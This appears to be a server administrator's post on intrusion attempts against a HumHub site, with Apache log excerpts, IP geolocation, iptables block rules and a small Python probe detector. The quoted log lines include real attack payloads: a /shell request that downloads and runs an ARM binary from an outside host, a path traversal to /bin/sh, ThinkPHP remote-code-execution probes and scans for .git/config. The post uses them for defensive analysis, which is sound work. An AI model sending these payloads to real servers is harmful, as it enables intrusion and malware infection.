Directory scan from IP: 82.180.149.210

IP Address      Country      Region         City
82.180.149.210  Netherlands  Noord-Holland  Amsterdam
ISP             Organization   Latitude  Longitude
Packethub S.A.  Not Available  52.3785   4.9000

Here is the list of directories probed:

# grep "82.180.149.210" /var/log/apache2/access.humhub.log | grep " 302 " | awk '{print $7}'
/
/
/git/
/git
/src/
/src
/config
/source/
/source
/sources/
/git/.git/config
/git/config
/src/.git/config
/src/config
/sources
/admin/
/source/.git/config
/admin
/source/config
/sources/.git/config
/sources/config
/admin/.git/config
/admin/config
/api
/rest/.git/config
/rest/config
/backend/.git/config
/rest/
/backend/config
/svc/.git/config
/svc/config
/service/.git/config
/service/config
/services/.git/config
/services/config
/app/.git/config
/app/config
/data/.git/config
/data/config
/rest
/bak/.git/config
/backend/
/bak/config
/backend
/svc/
/svc
/backup/.git/config
/backup/config
/test/.git/config
/test/config
/temp/.git/config
/temp/config
/tmp/.git/config
/tmp/config
/lib/.git/config
/lib/config
/libs/.git/config
/service/
/service
/services/
/services
/app/
/libs/config
/app
/cfg/.git/config
/data/
/data
/bak/
/bak
/backup/
/backup
/test/
/test
/cfg/config
/conf/.git/config
/conf/config
/config/.git/config
/config/config
/inc/.git/config
/inc/config
/include/.git/config
/include/config
/includes/.git/config
/includes/config
/temp/
/temp
/tmp/
/tmp
/lib/
/lib
/libs/
/libs
/cfg/
/cfg
/conf/
/conf
/config/
/config
/inc/
/inc
/include/
/include
/includes/
/includes
/upload/
/upload
/uploads/
/uploads/
/download/
/download
/downloads/
/downloads
/files/
/files
/log/
/log
/logs/
/logs
/cron/
/cron
/wallet/
/wallet
/wallets/
/wallets

So I blocked the IP.

# iptables -A INPUT -s 82.180.149.210 -j DROP
# /usr/sbin/iptables-save > /etc/iptables/rules.v4

Attack from IP: 193.106.191.48 (Russian Federation)

Here are all the attempts:

193.106.191.48 - - [25/May/2022:00:17:47 +0200] "GET /solr/admin/info/system?wt=json HTTP/1.1" 302 406 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
193.106.191.48 - - [25/May/2022:00:17:52 +0200] "GET /user/auth/login HTTP/1.1" 200 8276 "http://80.15.48.50:80/solr/admin/info/system?wt=json" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
193.106.191.48 - - [25/May/2022:01:04:50 +0200] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 302 406 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
193.106.191.48 - - [25/May/2022:01:04:52 +0200] "GET /user/auth/login HTTP/1.1" 200 8278 "http://80.15.48.50:80/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
193.106.191.48 - - [25/May/2022:01:47:43 +0200] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1" 302 406 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
193.106.191.48 - - [25/May/2022:01:47:43 +0200] "GET /user/auth/login HTTP/1.1" 200 8275 "http://80.15.48.50:80/?a=fetch&content=die(@md5(HelloThinkCMF))" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
193.106.191.48 - - [25/May/2022:02:38:44 +0200] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 302 406 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
193.106.191.48 - - [25/May/2022:02:38:57 +0200] "GET /user/auth/login HTTP/1.1" 200 8273 "http://80.15.48.50:80/?XDEBUG_SESSION_START=phpstorm" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
193.106.191.48 - - [25/May/2022:02:50:08 +0200] "GET /console/ HTTP/1.1" 302 406 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
193.106.191.48 - - [25/May/2022:02:50:08 +0200] "GET /user/auth/login HTTP/1.1" 200 8277 "http://80.15.48.50:80/console/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
193.106.191.48 - - [25/May/2022:03:29:20 +0200] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 302 218 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
193.106.191.48 - - [25/May/2022:03:29:20 +0200] "GET /user/auth/login HTTP/1.1" 200 8280 "http://80.15.48.50:80/Autodiscover/Autodiscover.xml" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
193.106.191.48 - - [25/May/2022:04:07:48 +0200] "GET /_ignition/execute-solution HTTP/1.1" 302 406 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
193.106.191.48 - - [25/May/2022:04:38:22 +0200] "GET / HTTP/1.1" 302 406 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
193.106.191.48 - - [25/May/2022:04:38:24 +0200] "GET /user/auth/login HTTP/1.1" 200 8279 "http://80.15.48.50:80" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
193.106.191.48 - - [25/May/2022:05:17:51 +0200] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 485 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
193.106.191.48 - - [25/May/2022:05:52:38 +0200] "GET / HTTP/1.1" 302 406 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
193.106.191.48 - - [25/May/2022:05:52:47 +0200] "GET /user/auth/login HTTP/1.1" 200 8278 "http://80.15.48.50:80/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
193.106.191.48 - - [25/May/2022:06:24:47 +0200] "GET /actuator/gateway/routes HTTP/1.1" 302 406 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
193.106.191.48 - - [25/May/2022:06:24:48 +0200] "GET /user/auth/login HTTP/1.1" 200 8277 "http://80.15.48.50:80/actuator/gateway/routes" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
193.106.191.48 - - [25/May/2022:07:41:34 +0200] "GET / HTTP/1.1" 302 5559 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
193.106.191.48 - - [25/May/2022:07:41:46 +0200] "GET /user/auth/login HTTP/1.1" 200 13475 "https://80.15.48.50:443" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
193.106.191.48 - - [25/May/2022:07:55:26 +0200] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 302 5371 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
193.106.191.48 - - [25/May/2022:07:55:28 +0200] "GET /user/auth/login HTTP/1.1" 200 13473 "https://80.15.48.50:443/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
193.106.191.48 - - [25/May/2022:08:40:07 +0200] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 302 5559 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
193.106.191.48 - - [25/May/2022:08:40:10 +0200] "GET /user/auth/login HTTP/1.1" 200 13471 "https://80.15.48.50:443/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
193.106.191.48 - - [25/May/2022:09:54:31 +0200] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 302 5559 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
193.106.191.48 - - [25/May/2022:09:54:32 +0200] "GET /user/auth/login HTTP/1.1" 200 13470 "https://80.15.48.50:443/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"

And, as if by coincidence:

IP Address      Country             Region  City
193.106.191.48  Russian Federation  Moskva  Moscow
ISP         Organization   Latitude  Longitude
Kanzas LLC  Not Available  55.7522   37.6156

My advice:

# iptables -A INPUT -s 193.106.191.48 -j DROP
# /usr/sbin/iptables-save > /etc/iptables/rules.v4
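As an added example (not part of the original post), a small Python script that applies the same reasoning to log lines like the ones quoted above: it parses Apache combined-format lines, counts per source IP the requests that match the probe paths seen on this page, and generates the same iptables rules used here. The sample log, the RFC 5737 addresses and the threshold of 3 hits are assumptions, not data from the page.

```python
import re
from collections import defaultdict
# Apache "combined" log line, the format of the excerpts quoted on this page.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Probe signatures from the request lines quoted on this page, matched against the request line
# only, so the follow-up "GET /user/auth/login" (HumHub's redirect target) is not counted twice.
PROBE_SIGNATURES = (
    "/.git/config", "/solr/admin/info/system", "invokefunction",
    "XDEBUG_SESSION_START", "/Autodiscover/Autodiscover.xml",
    "/_ignition/execute-solution", "/actuator/gateway/routes",
    "eval-stdin.php", "/cgi-bin/.%2e/", "die(@md5(",
)

def parse_line(line):
    """Fields of one combined-format line, or None if the line does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def probe_hits(lines):
    """Per source IP, the number of requests whose request line matches a probe signature."""
    hits = defaultdict(int)
    for line in lines:
        rec = parse_line(line)
        if rec and any(sig in rec["req"] for sig in PROBE_SIGNATURES):
            hits[rec["ip"]] += 1
    return dict(hits)

def ips_to_block(lines, threshold=3):
    """Source IPs with at least `threshold` probe hits (the threshold is an assumption)."""
    return sorted(ip for ip, n in probe_hits(lines).items() if n >= threshold)

def iptables_rules(ips):
    """The DROP rules used on this page, one per IP, plus the save step; returned, not executed."""
    rules = ["iptables -A INPUT -s %s -j DROP" % ip for ip in ips]
    rules.append("/usr/sbin/iptables-save > /etc/iptables/rules.v4")
    return rules

# Constructed sample (RFC 5737 addresses, shortened User-Agent), modelled on the excerpts above.
SAMPLE_LOG = r"""
203.0.113.10 - - [25/May/2022:00:17:47 +0200] "GET /solr/admin/info/system?wt=json HTTP/1.1" 302 406 "-" "Mozilla/5.0"
203.0.113.10 - - [25/May/2022:00:17:52 +0200] "GET /user/auth/login HTTP/1.1" 200 8276 "http://198.51.100.5:80/solr/admin/info/system?wt=json" "Mozilla/5.0"
203.0.113.10 - - [25/May/2022:01:04:50 +0200] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 302 406 "-" "Mozilla/5.0"
203.0.113.10 - - [25/May/2022:05:17:51 +0200] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 485 "-" "Mozilla/5.0"
203.0.113.77 - - [25/May/2022:03:00:00 +0200] "GET /src/.git/config HTTP/1.1" 302 406 "-" "Mozilla/5.0"
203.0.113.77 - - [25/May/2022:03:00:01 +0200] "GET /admin/.git/config HTTP/1.1" 302 406 "-" "Mozilla/5.0"
198.51.100.42 - - [25/May/2022:08:00:00 +0200] "GET /user/auth/login HTTP/1.1" 200 8270 "-" "Mozilla/5.0"
""".strip().splitlines()
```

Running `ips_to_block` over a real access log and piping `iptables_rules` into a shell gives the same rules the post applies by hand, with the threshold guarding against blocking a single stray request.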

Attack from IP: 45.9.20.101 (Amsterdam)

Here are all the attempts:

45.9.20.101 - - [11/May/2022:09:56:44 +0200] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 302 218 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.9.20.101 - - [11/May/2022:09:56:45 +0200] "GET /user/auth/login HTTP/1.1" 200 8190 "http://80.15.48.50:80/Autodiscover/Autodiscover.xml" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.9.20.101 - - [11/May/2022:11:09:47 +0200] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 302 400 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.9.20.101 - - [11/May/2022:11:09:48 +0200] "GET /user/auth/login HTTP/1.1" 200 8269 "http://80.15.48.50:80/?XDEBUG_SESSION_START=phpstorm" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.9.20.101 - - [11/May/2022:12:05:05 +0200] "GET /console/ HTTP/1.1" 302 400 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.9.20.101 - - [11/May/2022:12:05:05 +0200] "GET /user/auth/login HTTP/1.1" 200 8269 "http://80.15.48.50:80/console/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.9.20.101 - - [11/May/2022:12:25:06 +0200] "GET / HTTP/1.1" 302 5554 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.9.20.101 - - [11/May/2022:12:25:08 +0200] "GET /user/auth/login HTTP/1.1" 200 13468 "https://80.15.48.50:443/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.9.20.101 - - [11/May/2022:13:29:32 +0200] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 302 400 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.9.20.101 - - [11/May/2022:13:29:32 +0200] "GET /user/auth/login HTTP/1.1" 200 8272 "http://80.15.48.50:80/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.9.20.101 - - [11/May/2022:14:01:19 +0200] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1" 302 400 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.9.20.101 - - [11/May/2022:14:01:21 +0200] "GET /user/auth/login HTTP/1.1" 200 8269 "http://80.15.48.50:80/?a=fetch&content=die(@md5(HelloThinkCMF))" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.9.20.101 - - [11/May/2022:14:38:52 +0200] "GET /actuator/gateway/routes HTTP/1.1" 302 400 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.9.20.101 - - [11/May/2022:14:38:52 +0200] "GET /user/auth/login HTTP/1.1" 200 8269 "http://80.15.48.50:80/actuator/gateway/routes" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.9.20.101 - - [11/May/2022:15:02:21 +0200] "GET /actuator/gateway/routes HTTP/1.1" 302 5554 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.9.20.101 - - [11/May/2022:15:02:24 +0200] "GET /user/auth/login HTTP/1.1" 200 13465 "https://80.15.48.50:443/actuator/gateway/routes" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.9.20.101 - - [11/May/2022:16:01:06 +0200] "GET /solr/admin/info/system?wt=json HTTP/1.1" 302 400 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.9.20.101 - - [11/May/2022:16:01:06 +0200] "GET /user/auth/login HTTP/1.1" 200 8269 "http://80.15.48.50:80/solr/admin/info/system?wt=json" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"

Clearly it's not the first time:

# grep "45.9.20.101" /var/log/apache2/access.humhub.log* | wc -l
65

A piece of advice:

# iptables -A INPUT -s 45.9.20.101 -j DROP
# /usr/sbin/iptables-save > /etc/iptables/rules.v4

List of blocked IPs

So I blocked the following IPs:

42.193.42.236 - - [11/May/2022:10:13:54 +0200] "m+-rf+NW_BBBarm7%3b%23&remoteSubmit=Save" 400 0 "-" "-"
47.106.177.157 - - [11/May/2022:08:13:31 +0200] "GET /shell?cd+/tmp;+wget+http:/\\/51.81.133.91/FKKK/NW_BBB.arm;+chmod+777+NW_BBB.arm;+./NW_BBB.arm Jaws.Selfrep;rm+-rf+NW_BBB.arm" 400 0 "-" "-"
31.44.185.235 - - [11/May/2022:07:13:08 +0200] "GET /../../../mnt/mtd/Config/Account1 HTTP/1.1" 400 485 "-" "Mozilla/5.0 zgrab/0.x"
80.94.93.125 - - [11/May/2022:02:14:23 +0200] "POST /mgmt/tm/util/bash HTTP/1.1\n" 400 0 "-" "-"
164.92.236.186 - - [11/May/2022:00:18:53 +0200] "\x16\x03\x01" 400 0 "-" "-"

The largest number came from this IP:

IP Address     Country  Region   City
42.193.42.236  China    Beijing  Beijing
ISP                                         Organization   Latitude  Longitude
Tencent Cloud Computing (Beijing) Co. Ltd.  Not Available  39.9075   116.3972

The block:

# iptables -A INPUT -s 42.193.42.236 -j DROP
# iptables -A INPUT -s 47.106.177.157 -j DROP
# iptables -A INPUT -s 31.44.185.235 -j DROP
# iptables -A INPUT -s 80.94.93.125 -j DROP
# iptables -A INPUT -s 164.92.236.186 -j DROP
# /usr/sbin/iptables-save > /etc/iptables/rules.v4